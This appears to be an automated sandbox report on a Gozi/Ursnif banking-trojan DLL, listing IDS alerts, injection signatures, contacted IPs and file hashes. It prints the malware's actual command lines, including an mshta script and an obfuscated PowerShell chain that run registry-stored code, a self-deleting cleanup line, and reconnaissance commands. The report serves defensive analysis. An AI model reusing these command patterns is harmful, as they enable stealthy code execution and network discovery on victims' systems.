Analysis Overview
SHA256
b1d0b5b4ce535cdbf0b8fbd21c8583fbade52436da55fbb7c1d4c75d47eca75c
Threat Level: Known bad
The file 04447a2725f293f8a9746b0db58fa832 was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
suricata: ET MALWARE Ursnif Payload Request (cook64.rar)
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
suricata: ET MALWARE Ursnif Payload Request (cook32.rar)
Blocklisted process makes network request
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Gathers system information
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: CmdExeWriteProcessMemorySpam
Runs ping.exe
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Runs net.exe
Discovers systems in the same network
Enumerates processes with tasklist
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-06-14 08:59
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2022-06-14 08:59
Reported
2022-06-14 09:01
Platform
win10v2004-20220414-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Gozi, Gozi IFSB
suricata: ET MALWARE Ursnif Payload Request (cook32.rar)
suricata: ET MALWARE Ursnif Payload Request (cook64.rar)
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3884 set thread context of 2408 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 2408 set thread context of 3464 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2408 set thread context of 3236 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\cmd.exe |
| PID 2408 set thread context of 3860 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2408 set thread context of 4396 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 3236 set thread context of 2092 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\PING.EXE |
| PID 2408 set thread context of 3832 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\04447a2725f293f8a9746b0db58fa832.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\04447a2725f293f8a9746b0db58fa832.dll,#1
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ac2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ac2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\10AAFBA1-2FF6-C22D-3944-D3167DB8B7AA\\\ManagerPack'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name kmjerqocyu -value gp; new-alias -name yscpdhrj -value iex; yscpdhrj ([System.Text.Encoding]::ASCII.GetString((kmjerqocyu "HKCU:Software\AppDataLow\Software\Microsoft\10AAFBA1-2FF6-C22D-3944-D3167DB8B7AA").GameStop))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\piuulr1n\piuulr1n.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB89D.tmp" "c:\Users\Admin\AppData\Local\Temp\piuulr1n\CSCD3EC1ADFC1F647C8B5851D916681784E.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bp41bbro\bp41bbro.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB987.tmp" "c:\Users\Admin\AppData\Local\Temp\bp41bbro\CSCD4710BF84F9547F2878282E3E653B730.TMP"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\04447a2725f293f8a9746b0db58fa832.dll"
C:\Windows\system32\PING.EXE
ping localhost -n 5
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\EC07.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EC07.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\EC07.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EC07.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\EC07.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EC07.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\EC07.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EC07.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\EC07.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
Network
| Country | Destination | Domain | Proto |
| US | 13.89.178.26:443 | tcp | |
| US | 8.253.208.112:80 | tcp | |
| US | 8.253.208.112:80 | tcp | |
| US | 8.253.208.112:80 | tcp | |
| US | 13.107.43.16:80 | config.edge.skype.com | tcp |
| DE | 194.76.226.15:80 | 194.76.226.15 | tcp |
| IQ | 5.42.199.72:80 | 5.42.199.72 | tcp |
| US | 8.8.8.8:53 | xmhomestilesh.at | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
Files
memory/2592-130-0x0000000000000000-mapping.dmp
memory/2592-131-0x0000000000400000-0x000000000046F000-memory.dmp
memory/2592-133-0x0000000001500000-0x0000000001506000-memory.dmp
memory/2592-134-0x0000000002FE0000-0x0000000002FED000-memory.dmp
memory/3884-138-0x0000000000000000-mapping.dmp
memory/3884-139-0x0000019B1E140000-0x0000019B1E162000-memory.dmp
memory/3884-140-0x00007FFAC5060000-0x00007FFAC5B21000-memory.dmp
memory/2980-141-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\piuulr1n\piuulr1n.cmdline
| MD5 | 2c3fa395cdb41b7d4cc1f04c408e56ce |
| SHA1 | eefe7d748e8d11c7b49f080e87a937b8ef3da5c3 |
| SHA256 | 5d5982dd9d4b5617c963c5b1ea7a63475f95d21979e9c82a56f198695c305ae1 |
| SHA512 | d503a9f75cf9ed7c01448ad6b6f2502ff9734becdd7f0009ef60a5738cf5a6011659c1d07d6d3beaa35db6df05920ef20de5caa30ce667f4ae91e0a7f97c2d7d |
\??\c:\Users\Admin\AppData\Local\Temp\piuulr1n\piuulr1n.0.cs
| MD5 | f820213893ae01ec4cfea63472d9bee7 |
| SHA1 | 3f52e992772d4b98f56666d6c018d33c8499f8fb |
| SHA256 | 320df24e318288a7c53091fcf36ba34e2717e520d504e46d0c60538b04928c9b |
| SHA512 | 1e9fd857a3c6ffd7d6b291b156656b2c6983617849941e3901519703e4cb126c1f31d9233459fc0792acc985642b85772f03d1aa7f9de387d0b5fbf641bc26fe |
memory/3720-144-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\piuulr1n\CSCD3EC1ADFC1F647C8B5851D916681784E.TMP
| MD5 | 2601ae284f6ee6012fbc0c8aaaa02f79 |
| SHA1 | 511d770eaee0ebb406ec5b490596629724f9f039 |
| SHA256 | 7dd6148f9981b73198e0a89f56df79ba174ff295666ba04a4a9d975bebfd1793 |
| SHA512 | 035fbd2d2bc27e2d3f4d1a184f24738a68ee5fc1d2a3e7fb06b572efcd06d02d6e247027fc4954721300490986109c192c5e5e39df0859523f5e7b3756cfdb3f |
C:\Users\Admin\AppData\Local\Temp\RESB89D.tmp
| MD5 | 660b278715b6749fec4c7bb81e9896d3 |
| SHA1 | e46ba48ef4415e0c7179f627cea19c40feacaca1 |
| SHA256 | 04c0b579551e3596efe60473ffdd2c0e2d1733a5c4b959568de25cba4c8b76c9 |
| SHA512 | ebb66d28beb44c7e758ee32b32d0c556a1d14f29afba71a007fbdf3cd70b11c2c70dd86133b93578c7980b899003f147fdd911bc3d26792e7d9d7e9f99c85499 |
C:\Users\Admin\AppData\Local\Temp\piuulr1n\piuulr1n.dll
| MD5 | fb760ec07b8a7717882aadd2e5350632 |
| SHA1 | c69e3766d30849d79389a7d453242992990d6a37 |
| SHA256 | e2d3675b45cee6596bcbeebe2a5ea7eab8c5391a96bc915ab192e88af0b2bc34 |
| SHA512 | aba9cb449d86ea066ee4f5093fdeca16d123633f6d24b9eb6182637d9189046c75acde82c656d1add5063291a652a55462ca3d6ab121d6d1cc91a2a82f4073e3 |
memory/2132-148-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\bp41bbro\bp41bbro.cmdline
| MD5 | bbf03c1fea0a2452f4c93762cd844bca |
| SHA1 | 6c274bb02c4e6a532e75e815a1b582b9b5f1cd3f |
| SHA256 | 00e4b9866f20c8c88c60b3ceb41488329b9db43a310e71f9327c0adb7787f8d1 |
| SHA512 | 95b9692093c21f4aa595fa6693557715c4b23c34e4060a6d4ff2782d092b266902eb678ada8ce62f780af9ea39cff210c71b84333d1a5a387662f7e91367f349 |
\??\c:\Users\Admin\AppData\Local\Temp\bp41bbro\bp41bbro.0.cs
| MD5 | 0077218343b3a9ec4b12f1fd77ef52dc |
| SHA1 | 0b8e186a73e6403d5a1476ec828f338019ba5c9e |
| SHA256 | 83736f1996108f1f4ec03e27b8ecd278547bb2539ed7fe43ee81a9530c40befa |
| SHA512 | e02e64b413e176a985ea54746a01e9bf4c5ae57bca87e3ae6f670b9c12ddafa5bb9282029d53a9393cd5dbce8889002e054f5d14611baa5bd3aefd0ed381db9e |
memory/1836-151-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\bp41bbro\CSCD4710BF84F9547F2878282E3E653B730.TMP
| MD5 | 08a93a4db50358411fc112826b47ab92 |
| SHA1 | 27c7db569cacefa2dd28bb5152f1df60a6603960 |
| SHA256 | ecd74efb0c4b9d8b7ecb004fffe4bb1d6bdc838921ce573a675cc7f0218a0c31 |
| SHA512 | 262f6eb7d52f35da97d4a80e8360d55d84ad1d627de2fe18dfa7559cb97aeb5b1ef062ee83017e9fcdb9eb0e0be7b01997385d78454c8283df90e4db4bac4da8 |
C:\Users\Admin\AppData\Local\Temp\RESB987.tmp
| MD5 | 9e5c82fc009360d0d3866a4379e38f99 |
| SHA1 | 1f94abf5d6c39bdf3e2eff868885949bc0ea326a |
| SHA256 | f80c63eefad1e5f71f4f7ae05e0615bd57b5ed63d724b95bc6cc30cd9980eaf7 |
| SHA512 | 360a0c05385f7d6bd71f34087ab812aca0fc3c2a50ff78d6e313afa0b20594e623d64e976bc9a3c5944a49504c523d5372bb047e2fa4d9cab75b54b277ecd86b |
C:\Users\Admin\AppData\Local\Temp\bp41bbro\bp41bbro.dll
| MD5 | 3792202dfd8f7908330ff8ac7e66fb50 |
| SHA1 | 74cc53b201de44b6db1ab55da47dbfb8dc038b19 |
| SHA256 | 46213ec44853a6dee88329f23102a41e3434db1a668d6b221198824ca44e82fc |
| SHA512 | 7d6c7d08711f98633a23eb32a90de4db7eea18ed6c588eb09a710dddc195a4126f05155a58dcb5ff907d40f36b278d9624fe278728e7717323cea01d51d4d7a4 |
memory/3884-155-0x00007FFAC5060000-0x00007FFAC5B21000-memory.dmp
memory/3884-156-0x0000019B38950000-0x0000019B3898D000-memory.dmp
memory/3236-157-0x0000000000000000-mapping.dmp
memory/3464-158-0x00000159AA060000-0x00000159AA103000-memory.dmp
memory/3236-159-0x000001C308FA0000-0x000001C309043000-memory.dmp
memory/2408-160-0x0000000007880000-0x0000000007923000-memory.dmp
memory/2092-161-0x0000000000000000-mapping.dmp
memory/1740-162-0x0000000000000000-mapping.dmp
memory/4316-163-0x0000000000000000-mapping.dmp
memory/3832-164-0x0000000000000000-mapping.dmp
memory/3860-165-0x0000019C3BAE0000-0x0000019C3BB83000-memory.dmp
memory/4396-166-0x000002C9C6A60000-0x000002C9C6B03000-memory.dmp
memory/2092-167-0x0000025976D30000-0x0000025976DD3000-memory.dmp
memory/3832-169-0x0000000000466B20-0x0000000000466B24-memory.dmp
memory/2408-168-0x0000000009C90000-0x0000000009DCB000-memory.dmp
memory/3832-173-0x0000000001250000-0x00000000012E6000-memory.dmp
memory/2408-174-0x0000000009AE0000-0x0000000009C1A000-memory.dmp
memory/3236-178-0x000001C308FA0000-0x000001C309043000-memory.dmp
memory/2408-179-0x0000000007880000-0x0000000007923000-memory.dmp
memory/2504-180-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\EC07.bin1
| MD5 | 26af7d777fd98ac93b685d57580a1150 |
| SHA1 | 10d5ba39244172ad89717a2b0778798df83b3095 |
| SHA256 | 7146ce4006cb5ed9f84b2ee544dc768c3157437b091e33efd1a492059dcd4c21 |
| SHA512 | 75a12c5e790d61854665f26659f94fda31b17780810167c34f98eb30f306686d3112de7c4e92c768153e6b36adf60d42f805e267cd8541de9cb325936d479c1c |
memory/4172-182-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\EC07.bin1
| MD5 | 26af7d777fd98ac93b685d57580a1150 |
| SHA1 | 10d5ba39244172ad89717a2b0778798df83b3095 |
| SHA256 | 7146ce4006cb5ed9f84b2ee544dc768c3157437b091e33efd1a492059dcd4c21 |
| SHA512 | 75a12c5e790d61854665f26659f94fda31b17780810167c34f98eb30f306686d3112de7c4e92c768153e6b36adf60d42f805e267cd8541de9cb325936d479c1c |
memory/1632-184-0x0000000000000000-mapping.dmp
memory/3096-185-0x0000000000000000-mapping.dmp
memory/432-186-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\EC07.bin1
| MD5 | 605ed0d3e69bfa29831a5229268e70a7 |
| SHA1 | 29d36b842b459671b3eacd2a0059b6b9f81214e1 |
| SHA256 | 461946bd34740c9620fee8c1260fad1ed783184df14c1e602a533d8f9e65dc5c |
| SHA512 | 954b1ac369e1f46db3ea2b777f4b28d6920ce99273638f8daf16d219ccb7f3705343ad59f83daa6d48163d92510c53d199b80eb23bc7c72db4a070ddf8365529 |
memory/4284-188-0x0000000000000000-mapping.dmp
memory/2688-189-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\EC07.bin1
| MD5 | 687ed54c481c3d741d199a55984880bf |
| SHA1 | d929b88426f90eb65c4558846f54c8d9c49e1d19 |
| SHA256 | c7e1d0236da832665e4e47aca78bdbf49feaf8c3056f0fb2d35d316bee80a2f9 |
| SHA512 | 32c14d028716827b7427e3614e848b85d8f37809f4b066faddf12565539d508d463069fee4a2fc3ed78c0c3ad856adba182414331a9c45ada2637976ca57e183 |
memory/2348-191-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\EC07.bin1
| MD5 | 687ed54c481c3d741d199a55984880bf |
| SHA1 | d929b88426f90eb65c4558846f54c8d9c49e1d19 |
| SHA256 | c7e1d0236da832665e4e47aca78bdbf49feaf8c3056f0fb2d35d316bee80a2f9 |
| SHA512 | 32c14d028716827b7427e3614e848b85d8f37809f4b066faddf12565539d508d463069fee4a2fc3ed78c0c3ad856adba182414331a9c45ada2637976ca57e183 |
memory/2196-193-0x0000000000000000-mapping.dmp
memory/4200-194-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\EC07.bin1
| MD5 | 510f930e916d8fcb9026f0413db39411 |
| SHA1 | 305b9efd077d84f6c8c46b42da875b641e2bd099 |
| SHA256 | 5474fc334d755523abb7f593a829a41ab7ca08c175d7c6bf7e6070aec471f14a |
| SHA512 | e745b8de841409693154d144b5c85a5440f0876cdb3367fb40ea90148a52076c9b161db7c1d9152c5b9ed0abdc43b7644daaa1ba55a9820ebe80cb3bccf25ee3 |
memory/1604-196-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\EC07.bin1
| MD5 | 510f930e916d8fcb9026f0413db39411 |
| SHA1 | 305b9efd077d84f6c8c46b42da875b641e2bd099 |
| SHA256 | 5474fc334d755523abb7f593a829a41ab7ca08c175d7c6bf7e6070aec471f14a |
| SHA512 | e745b8de841409693154d144b5c85a5440f0876cdb3367fb40ea90148a52076c9b161db7c1d9152c5b9ed0abdc43b7644daaa1ba55a9820ebe80cb3bccf25ee3 |
memory/2192-198-0x0000000000000000-mapping.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2022-06-14 08:59
Reported
2022-06-14 09:01
Platform
win7-20220414-en
Max time kernel
36s
Max time network
39s
Command Line
Signatures
Gozi, Gozi IFSB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 848 wrote to memory of 1796 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 848 wrote to memory of 1796 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 848 wrote to memory of 1796 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 848 wrote to memory of 1796 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 848 wrote to memory of 1796 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 848 wrote to memory of 1796 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 848 wrote to memory of 1796 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\04447a2725f293f8a9746b0db58fa832.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\04447a2725f293f8a9746b0db58fa832.dll,#1
Network
Files
memory/1796-54-0x0000000000000000-mapping.dmp
memory/1796-55-0x0000000075951000-0x0000000075953000-memory.dmp
memory/1796-56-0x00000000001E0000-0x000000000024F000-memory.dmp
memory/1796-57-0x00000000001E0000-0x000000000024F000-memory.dmp
memory/1796-59-0x0000000000100000-0x0000000000106000-memory.dmp
memory/1796-60-0x0000000000360000-0x000000000036D000-memory.dmp